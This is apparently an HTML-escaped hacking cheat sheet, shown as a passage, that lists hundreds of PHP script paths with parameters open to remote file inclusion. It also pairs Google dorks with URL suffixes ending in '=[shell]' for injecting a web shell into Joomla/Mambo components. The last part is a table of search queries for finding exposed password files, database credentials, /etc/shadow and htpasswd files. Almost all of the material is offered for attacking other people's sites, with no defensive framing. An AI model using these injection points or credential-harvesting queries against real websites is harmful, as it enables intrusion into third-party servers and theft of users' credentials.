/&gt;/templates/headline_temp.php?nst_inc=&lt;br /&gt;index.php?var=&lt;br /&gt;index.php?pagina=&lt;br /&gt;index.php?go=&lt;br /&gt;index.php?site=&lt;br /&gt;phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=&lt;br /&gt;administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=&lt;br /&gt;index.php?pagina=&lt;br /&gt;index.php?id=&lt;br /&gt;index1.php?=&lt;br /&gt;index.php?site=&lt;br /&gt;main.php?id=&lt;br /&gt;content.php?page=&lt;br /&gt;admin.php?page=&lt;br /&gt;lib/gore.php?libpath=&lt;br /&gt;SQuery/lib/gore.php?libpath=&lt;br /&gt;index2.php?p=&lt;br /&gt;index1.php?go=&lt;br /&gt;news_detail.php?file=&lt;br /&gt;old_reports.php?file=&lt;br /&gt;index.php?x=&lt;br /&gt;index.php?nic=&lt;br /&gt;homepage.php?sel=&lt;br /&gt;index.php?sel=&lt;br /&gt;main.php?x=&lt;br /&gt;components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=&lt;br /&gt;index2.php?x=&lt;br /&gt;main.php?pagina=&lt;br /&gt;test.php?page=&lt;br /&gt;components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=&lt;br /&gt;akocomments.php?mosConfig_absolute_path=&lt;br /&gt;index.php?page=&lt;br /&gt;index.php?oldal=&lt;br /&gt;index.php?lang=&lt;br /&gt;index.php?pag=&lt;br /&gt;index.php?incl=&lt;br /&gt;avatar.php?page=&lt;br /&gt;index.php?_REQUEST=&amp;_REQUEST%5boption%5d=com_content&amp;_REQUEST%5bItemid%5d=1&amp;GLOBALS=&amp;mosConfig_absolute_path=&lt;br /&gt;index.php?_REQUEST=&amp;_REQUEST%5boption%5d=com_content&amp;_REQUEST%5bItemid%5d=1&amp;GLOBALS=&amp;mosConfig_absolute_path=&lt;br /&gt;index.php?p=&lt;br /&gt;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;index.php?x=&lt;br /&gt;index.php?mode=&lt;br /&gt;index.php?stranica=&lt;br /&gt;index.php?sub=&lt;br /&gt;index.php?id=&lt;br /&gt;index.php?t=&lt;br /&gt;index.php?r=&lt;br /&gt;index.php?menu=&lt;br /&gt;index.php?pag=&lt;br /&gt;solpot.html?body=&lt;br /&gt;port.php?content=&lt;br /&gt;index0.php?show=&lt;br /&gt;administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=&lt;br /&gt;/tools/send_reminders.php?includedir=&lt;br /&gt;administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=&lt;br /&gt;/tags.php?BBCodeFile=&lt;br /&gt;administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=&lt;br /&gt;content.php?page=&lt;br /&gt;index.php?topic=&lt;br /&gt;index.php?u=&lt;br /&gt;administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=&lt;br /&gt;administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=&lt;br /&gt;modules/My_eGallery/index.php?basepath=&lt;br /&gt;/modules/vwar/admin/admin.php?vwar_root=&lt;br /&gt;index.php?loc=&lt;br /&gt;administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=&lt;br /&gt;administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=&lt;br /&gt;/tags.php?BBCodeFile=&lt;br /&gt;myevent.php?myevent_path=&lt;br /&gt;/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=&lt;br /&gt;myevent.php?myevent_path=&lt;br /&gt;includes/functions.php?phpbb_root_path=&lt;br /&gt;m2f/m2f_phpbb204.php?m2f_root_path=&lt;br /&gt;/tags.php?BBCodeFile=&lt;br /&gt;administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=&lt;br /&gt;show.php?path=&lt;br /&gt;show.php?path=&lt;br /&gt;administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=&lt;br /&gt;administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=&lt;br /&gt;index.php?template=&lt;br /&gt;search.php?cutepath=&lt;br /&gt;show_news.php?cutepath=&lt;br /&gt;page.php?doc=&lt;br /&gt;administrator/components/com_webring/admin.webring.docs.php?component_dir=&lt;br /&gt;administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=&lt;br /&gt;help.php?css_path=&lt;br /&gt;components/com_galleria/galleria.html.php?mosConfig_absolute_path=&lt;br /&gt;big.php?pathtotemplate=&lt;br /&gt;includes/search.php?GlobalSettings[templatesDirectory]=&lt;br /&gt;interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=&lt;br /&gt;/functions.php?include_path=&lt;br /&gt;modules/My_eGallery/index.php?basepath=&lt;br /&gt;components/com_galleria/galleria.html.php?mosConfig_absolute_path=&lt;br /&gt;/includes/orderSuccess.inc.php?glob=1&amp;cart_order_id=1&amp;glob[rootDir]=&lt;br /&gt;/class.mysql.php?path_to_bt_dir=&lt;br /&gt;/include/footer.inc.php?_AMLconfig[cfg_serverpath]=&lt;br /&gt;/squirrelcart/cart_content.php?cart_isp_root=&lt;br /&gt;index2.php?to=&lt;br /&gt;index.php?load=&lt;br /&gt;home.php?pagina=&lt;br /&gt;/modules/coppermine/include/init.inc.php?CPG_M_DIR=&lt;br /&gt;/modules/Forums/admin/admin_styles.php?phpbb_root_path=&lt;br /&gt;/modules/vwar/admin/admin.php?vwar_root=&lt;br /&gt;/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=&lt;br /&gt;/modules/My_eGallery/public/displayCategory.php?basepath=&lt;br /&gt;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;/modules/4nAlbum/public/displayCategory.php?basepath=&lt;br /&gt;/include/write.php?dir=&lt;br /&gt;db.php?path_local=&lt;br /&gt;index.php?site=&lt;br /&gt;index.php?url=&lt;br /&gt;index.php?p=&lt;br /&gt;index.php?openfile=&lt;br /&gt;index.php?file=&lt;br /&gt;index.php?go=&lt;br /&gt;index.php?content=&lt;br /&gt;index.php?side=&lt;br /&gt;index.php?kobr=&lt;br /&gt;index.php?doc=&lt;br /&gt;index.php?l=&lt;br /&gt;index.php?a=&lt;br /&gt;index.php?principal=&lt;br /&gt;index.php?show=&lt;br /&gt;index.php?opcao=&lt;br /&gt;index.php?conteudo=&lt;br /&gt;index.php?meio=&lt;br /&gt;index.php?inc=&lt;br /&gt;index.php?c=&lt;br /&gt;index.php?rage=&lt;br /&gt;index.php?arquivo=&lt;br /&gt;index.php?nic=&lt;br /&gt;index.php?x=&lt;br /&gt;components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=&lt;br /&gt;index.php?place=&lt;br /&gt;index.php?show=&lt;br /&gt;index.php?dsp=&lt;br /&gt;index.php?dept=&lt;br /&gt;index.php?lg=&lt;br /&gt;index.php?inhalt=&lt;br /&gt;index.php?ort=&lt;br /&gt;index.php?pilih=&lt;br /&gt;principal.php?conteudo=&lt;br /&gt;main.php?site=&lt;br /&gt;template.php?pagina=&lt;br /&gt;contenido.php?sec=&lt;br /&gt;index_principal.php?pagina=&lt;br /&gt;template.php?name=&lt;br /&gt;forum.php?act=&lt;br /&gt;home.php?action=&lt;br /&gt;home.php?pagina=&lt;br /&gt;noticias.php?arq=&lt;br /&gt;main.php?x=&lt;br /&gt;main.php?page=&lt;br /&gt;default.php?page=&lt;br /&gt;index.php?cont=&lt;br /&gt;index.php?configFile=&lt;br /&gt;index.php?meio.php=&lt;br /&gt;index.php?include=&lt;br /&gt;index.php?open=&lt;br /&gt;index.php?visualizar=&lt;br /&gt;index.php?x=&lt;br /&gt;index.php?pag=&lt;br /&gt;index.php?cat=&lt;br /&gt;index.php?action=&lt;br /&gt;index.php?do=&lt;br /&gt;index2.php?x=&lt;br /&gt;index2.php?content=&lt;br /&gt;main.php?pagina=&lt;br /&gt;index.phpmain.php?x=&lt;br /&gt;index.php?link=&lt;br /&gt;index.php?canal=&lt;br /&gt;index.php?screen=&lt;br /&gt;index.php?langc=&lt;br /&gt;services.php?page=&lt;br /&gt;htmltonuke.php?filnavn=&lt;br /&gt;ihm.php?p=&lt;br /&gt;default.php?page=&lt;br /&gt;folder.php?id=&lt;br /&gt;index.php?Load=&lt;br /&gt;index.php?Language=&lt;br /&gt;hall.php?file=&lt;br /&gt;hall.php?page=&lt;br /&gt;template.php?goto=&lt;br /&gt;video.php?content=&lt;br /&gt;pages.php?page=&lt;br /&gt;print.php?page=&lt;br /&gt;show.php?page=&lt;br /&gt;view.php?page=&lt;br /&gt;media.php?page=&lt;br /&gt;index1.php?choix=&lt;br /&gt;index1.php?menu=&lt;br /&gt;index.php?ort=&lt;br /&gt;index2.php?showpage=&lt;br /&gt;index2.php?ascii_seite=&lt;br /&gt;index2.php?DoAction=&lt;br /&gt;index2.php?ID=&lt;br /&gt;index2.php?url_page=&lt;br /&gt;index1.php?dat=&lt;br /&gt;index1.php?site=&lt;br /&gt;index0.php?show=&lt;br /&gt;home.php?content=&lt;br /&gt;port.php?content=&lt;br /&gt;main.php?link=&lt;br /&gt;home.php?x=&lt;br /&gt;index1.php?x=&lt;br /&gt;index2.php?x=&lt;br /&gt;main.php?x=&lt;br /&gt;homepage.php?sel=&lt;br /&gt;/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;/modules/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;/include/main.php?config[search_disp]=true&amp;include_dir=&lt;br /&gt;/contrib/yabbse/poc.php?poc_root_path=&lt;br /&gt;/phpopenchat/contrib/yabbse/poc.php?sourcedir=&lt;br /&gt;/photoalb/lib/static/header.php?set_menu=&lt;br /&gt;/squito/photolist.inc.php?photoroot=&lt;br /&gt;/bz/squito/photolist.inc.php?photoroot=&lt;br /&gt;/ppa/inc/functions.inc.php?config[ppa_root_path]=&lt;br /&gt;/spid/lang/lang.php?lang_path=&lt;br /&gt;/classes.php?LOCAL_PATH=&lt;br /&gt;al_initialize.php?alpath=&lt;br /&gt;/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=&lt;br /&gt;/index.php?_REQUEST=&amp;_REQUEST[option]=com_content&amp;_REQUEST[Itemid]=1&amp;GLOBALS=&amp;mosConfig_absolute_path=&lt;br /&gt;/extensions/moblog/moblog_lib.php?basedir=&lt;br /&gt;/app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=&lt;br /&gt;components/com_performs/performs.php?mosConfig_absolute_path=&lt;br /&gt;modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=&lt;br /&gt;/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_smf/smf.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_cpg/cpg.php?mosConfig_absolute_path=&lt;br /&gt;administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=&lt;br /&gt;/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=&lt;br /&gt;inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:br bp_ncom.php?bnrep=&lt;br /&gt;/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=&lt;br /&gt;/jscript.php?my_ms[root]=&lt;br /&gt;/popup_window.php?site_isp_root=&lt;br /&gt;/yabbse/Sources/Packages.php?sourcedir=&lt;br /&gt;/include/main.php?config[search_disp]=true&amp;include_dir=&lt;br /&gt;/include/main.php?config[search_disp]=true&amp;include_dir=&lt;br /&gt;/includes/functions_portal.php?phpbb_root_path=&lt;br /&gt;/surveys/survey.inc.php?path=&lt;br /&gt;index.php?body=&lt;br /&gt;/classes/adodbt/sql.php?classes_dir=&lt;br /&gt;enc/content.php?Home_Path=&lt;br /&gt;/classified_right.php?language_dir=&lt;br /&gt;/sources/functions.php?CONFIG[main_path]=&lt;br /&gt;/sources/template.php?CONFIG[main_path]=&lt;br /&gt;/embed/day.php?path=&lt;br /&gt;/includes/dbal.php?eqdkp_root_path=&lt;br /&gt;sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]=&lt;br /&gt;/includes/kb_constants.php?module_root_path=&lt;br /&gt;/mcf.php?content=&lt;br /&gt;/components/com_facileforms/facileforms.frame.php?ff_compath=&lt;br /&gt;skins/advanced/advanced1.php?pluginpath[0]=&lt;br /&gt;/zipndownload.php?PP_PATH=&lt;br /&gt;/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_zoom/includes/database.php?mosConfig_absolute_path=&lt;br /&gt;/main.php?sayfa=&lt;br /&gt;/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=&lt;br /&gt;/addpost_newpoll.php?addpoll=preview&amp;thispath=&lt;br /&gt;/header.php?abspath=&lt;br /&gt;components/com_performs/performs.php?mosConfig_absolute_path=&lt;br /&gt;administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=&lt;br /&gt;/modules/vwar/admin/admin.php?vwar_root=&lt;br /&gt;/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=&lt;br /&gt;administrator/components/com_remository/admin.remosi&lt;br /&gt;&lt;br /&gt;RFI--------------------RFI--------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:"com_fm"&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;components/com_fm/fm.install.php?lm_absolute_path=[shell]&lt;br /&gt;&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_mambelfish&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=[shell]&lt;br /&gt;&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_lmo&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;components/com_lmo/lmo.php?mosConfig_absolute_path=[shell]&lt;br /&gt;&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_linkdirectory&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=[shell]&lt;br /&gt;&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_mtree&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=[shell]&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_jim&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=[shell]&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_webring&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;administrator/components/com_webring/admin.webring.docs.php?component_dir=[shell]&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_remository&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=[shell]&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_babackup&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=[shell]&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_lurm_constructor&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=[shell]&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_mambowiki&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;components/com_mambowiki/ MamboLogin.php?IP=[shell]&lt;br /&gt;&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_a6mambocredits&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=[shell]&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_phpshop&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=[shell]&lt;br /&gt;&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_cpg&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;components/com_cpg/cpg.php?mosConfig_absolute_path=[shell]&lt;br /&gt;&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_moodle&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;components/com_moodle/moodle.php?mosConfig_absolute_path=[shell]&lt;br /&gt;&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_extended_registration&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=[shell]&lt;br /&gt;&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_mospray&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;components/com_mospray/scripts/admin.php?basedir=[shell]&lt;br /&gt;&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_bayesiannaivefilter&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[shell]&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_uhp&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=[shell]&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_peoplebook&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=[shell]&lt;br /&gt;&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_mmp&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=[shell]&lt;br /&gt;&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_reporter&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=[shell]&lt;br /&gt;&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_madeira&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;/components/com_madeira/img.php?url=[shell]&lt;br /&gt;&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_jd-wiki&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=[shell]&lt;br /&gt;Google Dork:&lt;br /&gt;inurl:com_bsq_sitestats&lt;br /&gt;&lt;br /&gt;Site Sonuna:&lt;br /&gt;/components/com_bsq_sitestats/external/rssfeed.php?baseDir=[shell]&lt;br /&gt;Site Sonuna2:&lt;br /&gt;/com_bsq_sitestats/external/rssfeed.php?baseDir=[shell] &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Google dork buat cari password &lt;br /&gt;———————————————————&lt;br /&gt;inurl:admin inurl: |userlist Generic userlist files&lt;br /&gt;———————————————————&lt;br /&gt;inurl:admin filetype: |asp Generic userlist files&lt;br /&gt;inurl:userlist |&lt;br /&gt;———————————————————&lt;br /&gt;inurl: |Half-life statistics file, lists username and&lt;br /&gt;hlstats intext: |other information&lt;br /&gt;Server Username |&lt;br /&gt;———————————————————&lt;br /&gt;filetype:ctl |&lt;br /&gt;inurl:haccess. |Microsoft FrontPage equivalent of htaccess&lt;br /&gt;ctl Basic |shows Web user credentials&lt;br /&gt;———————————————————&lt;br /&gt;filetype:reg |&lt;br /&gt;reg intext: |Microsoft Internet Account Manager can&lt;br /&gt;———————————————————&lt;br /&gt;”internet account manager” |reveal usernames and more&lt;br /&gt;filetype:wab wab |Microsoft Outlook Express Mail address&lt;br /&gt;|books&lt;br /&gt;———————————————————&lt;br /&gt;filetype:mdb inurl:profiles |Microsoft Access databases containing&lt;br /&gt;|profiles.&lt;br /&gt;———————————————————&lt;br /&gt;index.of perform.ini |mIRC IRC ini file can list IRC usernames and&lt;br /&gt;|other information&lt;br /&gt;———————————————————&lt;br /&gt;inurl:root.asp?acs=anon |Outlook Mail Web Access directory can be&lt;br /&gt;|used to discover usernames&lt;br /&gt;———————————————————&lt;br /&gt;filetype:conf inurl:proftpd. |PROFTP FTP server configuration file&lt;br /&gt;conf –sample |reveals&lt;br /&gt;|username and server information&lt;br /&gt;———————————————————&lt;br /&gt;filetype:log username putty |PUTTY SSH client logs can reveal&lt;br /&gt;|usernames&lt;br /&gt;|and server information&lt;br /&gt;———————————————————&lt;br /&gt;filetype:rdp rdp |Remote Desktop Connection files reveal user&lt;br /&gt;|credentials&lt;br /&gt;———————————————————&lt;br /&gt;intitle:index.of |UNIX bash shell history reveals commands&lt;br /&gt;.bash_history |typed at a bash command prompt; usernames&lt;br /&gt;|are often typed as argument strings&lt;br /&gt;———————————————————&lt;br /&gt;intitle:index.of |UNIX shell history reveals commands typed at&lt;br /&gt;.sh_history |a shell command prompt; usernames are&lt;br /&gt;|often typed as argument strings&lt;br /&gt;———————————————————&lt;br /&gt;“index of ” lck |Various lock files list the user currently using&lt;br /&gt;|a file&lt;br /&gt;———————————————————&lt;br /&gt;+intext:webalizer +intext: |Webalizer Web statistics page lists Web user-&lt;br /&gt;Total Usernames +intext: |names and statistical information&lt;br /&gt;”Usage Statistics for”&lt;br /&gt;———————————————————&lt;br /&gt;filetype:reg reg HKEY_ |Windows Registry exports can reveal&lt;br /&gt;CURRENT_USER |username usernames and other information&lt;br /&gt;———————————————————&lt;br /&gt;&lt;br /&gt;TABEL KATA-KATA KUNCI MENDAPATKAN PASSWORD&lt;br /&gt;&lt;br /&gt;———————————————————&lt;br /&gt;KATA KUNCI | KETERANGAN&lt;br /&gt;———————————————————&lt;br /&gt;inurl:/db/main.mdb |ASP-Nuke passwords&lt;br /&gt;———————————————————&lt;br /&gt;filetype:cfm “cfapplication |ColdFusion source with potential passwords&lt;br /&gt;name” password&lt;br /&gt;———————————————————&lt;br /&gt;filetype:pass |dbman credentials&lt;br /&gt;pass intext:userid&lt;br /&gt;———————————————————&lt;br /&gt;allinurl:auth_user_file.txt |DCForum user passwords&lt;br /&gt;———————————————————&lt;br /&gt;eggdrop filetype:user user |Eggdrop IRC user credentials&lt;br /&gt;———————————————————&lt;br /&gt;filetype:ini inurl:flashFXP.ini |FlashFXP FTP credentials&lt;br /&gt;———————————————————&lt;br /&gt;filetype:url +inurl:”ftp://” |FTP bookmarks cleartext passwords&lt;br /&gt;+inurl:”@”&lt;br /&gt;———————————————————&lt;br /&gt;inurl:zebra.conf intext: |GNU Zebra passwords&lt;br /&gt;password -sample -test&lt;br /&gt;-tutorial –download&lt;br /&gt;———————————————————&lt;br /&gt;filetype:htpasswd htpasswd |HTTP htpasswd Web user credentials&lt;br /&gt;———————————————————&lt;br /&gt;intitle:”Index of” “.htpasswd” |HTTP htpasswd Web user credentials&lt;br /&gt;“htgroup” -intitle:”dist”&lt;br /&gt;-apache -htpasswd.c&lt;br /&gt;———————————————————&lt;br /&gt;intitle:”Index of” “.htpasswd” |HTTP htpasswd Web user credentials&lt;br /&gt;htpasswd.bak&lt;br /&gt;———————————————————&lt;br /&gt;“http://*:*@www” bob:bob |HTTP passwords (bob is a sample username)&lt;br /&gt;———————————————————&lt;br /&gt;“sets mode: +k” |IRC channel keys (passwords)&lt;br /&gt;———————————————————&lt;br /&gt;“Your password is * |Remember IRC NickServ registration passwords&lt;br /&gt;this for later use”&lt;br /&gt;———————————————————&lt;br /&gt;signin filetype:url |JavaScript authentication credentials&lt;br /&gt;———————————————————&lt;br /&gt;LeapFTP intitle:”index.of./” |LeapFTP client login credentials&lt;br /&gt;sites.ini modified&lt;br /&gt;———————————————————&lt;br /&gt;inurl:lilo.conf filetype:conf |LILO passwords&lt;br /&gt;password -tatercounter2000&lt;br /&gt;-bootpwd –man&lt;br /&gt;———————————————————&lt;br /&gt;filetype:config config intext: |Microsoft .NET application credentials&lt;br /&gt;appSettings “User ID”&lt;br /&gt;———————————————————&lt;br /&gt;filetype:pwd service |Microsoft FrontPage Service Web passwords&lt;br /&gt;———————————————————&lt;br /&gt;intitle:index.of |Microsoft FrontPage Web credentials&lt;br /&gt;administrators.pwd&lt;br /&gt;———————————————————&lt;br /&gt;“# -FrontPage-” |Microsoft FrontPage Web passwords&lt;br /&gt;inurl:service.pwd&lt;br /&gt;ext:pwd inurl:_vti_pvt inurl: |Microsoft FrontPage Web passwords&lt;br /&gt;(Service | authors | administrators)&lt;br /&gt;———————————————————&lt;br /&gt;inurl:perform filetype:ini |mIRC nickserv credentials&lt;br /&gt;———————————————————&lt;br /&gt;intitle:”index of” intext: |mySQL database credentials&lt;br /&gt;connect.inc&lt;br /&gt;———————————————————&lt;br /&gt;intitle:”index of” intext: |mySQL database credentials&lt;br /&gt;globals.inc&lt;br /&gt;———————————————————&lt;br /&gt;filetype:conf oekakibbs |Oekakibss user passwords&lt;br /&gt;———————————————————&lt;br /&gt;filetype:dat wand.dat |Opera‚ ÄúMagic Wand‚Äù Web credentials&lt;br /&gt;———————————————————&lt;br /&gt;inurl:ospfd.conf intext: |OSPF Daemon Passwords&lt;br /&gt;password -sample -test&lt;br /&gt;-tutorial –download&lt;br /&gt;———————————————————&lt;br /&gt;index.of passlist |Passlist user credentials&lt;br /&gt;———————————————————&lt;br /&gt;inurl:passlist.txt |passlist.txt file user credentials&lt;br /&gt;———————————————————&lt;br /&gt;filetype:dat “password.dat” |password.dat files&lt;br /&gt;———————————————————&lt;br /&gt;inurl:password.log filetype:log |password.log file reveals usernames,&lt;br /&gt;|passwords,and hostnames&lt;br /&gt;———————————————————&lt;br /&gt;filetype:log inurl:”password.log” |password.log files cleartext&lt;br /&gt;|passwords&lt;br /&gt;———————————————————&lt;br /&gt;inurl:people.lst filetype:lst |People.lst generic password file&lt;br /&gt;———————————————————&lt;br /&gt;intitle:index.of config.php |PHP Configuration File database&lt;br /&gt;|credentials&lt;br /&gt;———————————————————&lt;br /&gt;inurl:config.php dbuname dbpass |PHP Configuration File database&lt;br /&gt;|credentials&lt;br /&gt;———————————————————&lt;br /&gt;inurl:nuke filetype:sql |PHP-Nuke credentials&lt;br /&gt;———————————————————&lt;br /&gt;filetype:conf inurl:psybnc.conf |psyBNC IRC user credentials&lt;br /&gt;“USER.PASS=”&lt;br /&gt;———————————————————&lt;br /&gt;filetype:ini ServUDaemon |servU FTP Daemon credentials&lt;br /&gt;———————————————————&lt;br /&gt;filetype:conf slapd.conf |slapd configuration files root password&lt;br /&gt;———————————————————&lt;br /&gt;inurl:”slapd.conf” intext: |slapd LDAP credentials&lt;br /&gt;”credentials” -manpage&lt;br /&gt;-”Manual Page” -man: -sample&lt;br /&gt;———————————————————&lt;br /&gt;inurl:”slapd.conf” intext: |slapd LDAP root password&lt;br /&gt;”rootpw” -manpage&lt;br /&gt;-”Manual Page” -man: -sample&lt;br /&gt;———————————————————&lt;br /&gt;filetype:sql “IDENTIFIED BY” –cvs |SQL passwords&lt;br /&gt;———————————————————&lt;br /&gt;filetype:sql password |SQL passwords&lt;br /&gt;———————————————————&lt;br /&gt;filetype:ini wcx_ftp |Total Commander FTP passwords&lt;br /&gt;———————————————————&lt;br /&gt;filetype:netrc password |UNIX .netrc user credentials&lt;br /&gt;———————————————————&lt;br /&gt;index.of.etc |UNIX /etc directories contain&lt;br /&gt;|various credential files&lt;br /&gt;———————————————————&lt;br /&gt;intitle:”Index of..etc” passwd |UNIX /etc/passwd user credentials&lt;br /&gt;———————————————————&lt;br /&gt;intitle:index.of passwd |UNIX /etc/passwd user credentials&lt;br /&gt;passwd.bak&lt;br /&gt;———————————————————&lt;br /&gt;intitle:”Index of” pwd.db |UNIX /etc/pwd.db credentials&lt;br /&gt;———————————————————&lt;br /&gt;intitle:Index.of etc shadow |UNIX /etc/shadow user credentials&lt;br /&gt;———————————————————&lt;br /&gt;intitle:index.of master.passwd |UNIX master.passwd user credentials&lt;br /&gt;———————————————————&lt;br /&gt;intitle:”Index of” spwd.db |UNIX spwd.db credentials&lt;br /&gt;passwd -pam.conf&lt;br /&gt;———————————————————&lt;br /&gt;filetype:bak inurl:”htaccess| |UNIX various password file backups&lt;br /&gt;passwd|shadow|htusers&lt;br /&gt;———————————————————&lt;br /&gt;filetype:inc dbconn |Various database credentials&lt;br /&gt;———————————————————&lt;br /&gt;filetype:inc intext:mysql_ |Various database credentials, server names&lt;br /&gt;connect&lt;br /&gt;———————————————————&lt;br /&gt;filetype:properties inurl:db |Various database credentials, server names&lt;br /&gt;intext:password&lt;br /&gt;———————————————————&lt;br /&gt;inurl:vtund.conf intext:pass –cvs |Virtual Tunnel Daemon passwords&lt;br /&gt;———————————————————&lt;br /&gt;inurl:”wvdial.conf” intext: |wdial dialup user credentials&lt;br /&gt;”password”&lt;br /&gt;———————————————————&lt;br /&gt;filetype:mdb wwforum |Web Wiz Forums Web credentials&lt;br /&gt;———————————————————&lt;br /&gt;“AutoCreate=TRUE password=*” |Website Access Analyzer user passwords&lt;br /&gt;———————————————————&lt;br /&gt;filetype:pwl pwl |Windows Password List user credentials&lt;br /&gt;———————————————————&lt;br /&gt;filetype:reg reg +intext: |Windows Registry Keys containing 